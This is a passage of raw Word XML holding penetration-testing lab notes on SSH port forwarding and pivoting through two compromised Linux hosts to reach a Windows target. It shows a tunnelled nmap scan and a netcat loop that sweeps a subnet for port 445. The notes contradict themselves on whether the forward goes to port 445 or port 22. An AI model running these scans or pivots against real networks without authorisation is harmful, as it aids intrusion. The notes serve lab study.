    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000820">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Middleman forwards that traffic to TARGET:445 on subnet B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000821">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p 4445 127.0.0.1 -Pn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000822">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By specifying 127.0.0.1 and port 4445, this NMAP command gets re-directed (through SSH tunnel) to port 22 on the TARGET machine, as specified in the SSH Local Port Forward. So, we will get results back for the Target machine!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000823">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will scan port 22 on Target Machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000824">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000825">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: In the most simple scenario with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Middleman</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can either use socat on the middleman, or SSH on the Kali. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000826">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The limitation of Socat is that we need socat on the target machine, and shell access on the target machine. We can probably upload the binary though if we need to. Thought it might not be stable on Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000827">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The limitation of SSH is that we need the SSH port on Middleman to be open AND the SSH credentials to Middleman. We don't actually need shell access on the Middleman in this case, just SSH credentials to Middleman.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000828">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000829">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OUTCOME: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The end result is that our Kali specifies the IP and Port of the SSH Client, which then sends traffic to a machine that the SSH server can access. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vvnj0b684j1u" w:id="73"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="178" name="image166.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image166.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId179"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="189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E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="746"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we are in this more complex scenario, with 3 subnets. We have to pivot through two machines in order to get to the target machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on port 445</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, lucky for us, we can do this all in a single SSH command! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="746"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Both CONFLUENCE01 and PGDATABASE01 are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the target machine is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000830">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000831">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this scenario, we'll assume that we have compromised both CONFLUENCE01 and PGDATABASE01. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000832">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000833">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4357688" cy="3246331"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="99" name="image96.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image96.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId180"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4357688" cy="3246331"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000834">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="969"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000835">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="969"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on PGDATABASE01, our second pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="969"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that we are connected to two subnets. And these are our two IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000837">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="969"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.215/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="969"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.50.215/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000839">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll then run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to discover what subnets are already in the routing table.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1536700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="205" name="image194.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image194.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId181"/>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83C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="471"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We find that PGDATABASE01 is attached to another subnet, this time in the 172.16.50.0/24 range (with ens224). We don't find a port scanner installed on PGDATABASE01; however, we can still do some initial reconnaissance with the tools that are available</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's write a Bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop to sweep for hosts with an open port 445 on the /24 subnet. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because we want to access the target machine and we know it has port 445 open. So if there is only one port 445 open, then we know that IP will belong to the target machine.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5414963" cy="1917799"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="493" name="image473.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image473.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId182"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5414963" cy="1917799"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="975"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="975"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use Netcat to make the connections, passing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag to check for a listening port without sending data, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for verbosity, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> set to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lower time-out threshold</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000841">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
